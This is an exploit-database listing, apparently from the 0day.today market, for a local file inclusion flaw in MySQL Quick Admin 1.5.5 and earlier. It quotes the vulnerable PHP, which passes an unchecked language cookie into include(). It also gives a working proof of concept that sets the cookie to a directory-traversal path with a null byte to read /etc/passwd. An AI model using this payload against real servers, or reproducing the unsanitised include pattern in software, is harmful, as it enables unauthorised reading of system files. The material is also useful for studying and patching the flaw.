[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3814
Category
web applications
Date add
30-09-2008
Platform
unsorted
======================================================================
MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
======================================================================


# MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
# url: http://www.mysqlquickadmin.com/
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: Pepelux :)
#
# *Requirements: magic_quotes_gpc = Off

vuln file: /includes/required.php
vuln code: 

if(!empty($_COOKIE['language']) && !isset($_SESSION['language'])){
	$_SESSION['language'] = $_COOKIE['language'];
}

....

if(LANG == ""){
	if(!isset($_SESSION['language'])){
		include("lang/english/lang.php");
		$_LANG = "english";
	} else {
		include("lang/".$_SESSION['language']."/lang.php");
		$_LANG = $_SESSION['language'];
	}

... }

LFI (poc): 
1) javascript:document.cookie="language=../../../../../../../../../../etc/passwd%00; path=/";
2) and enters /index.php

Ingenious work :D



#  0day.today [2024-12-25]  #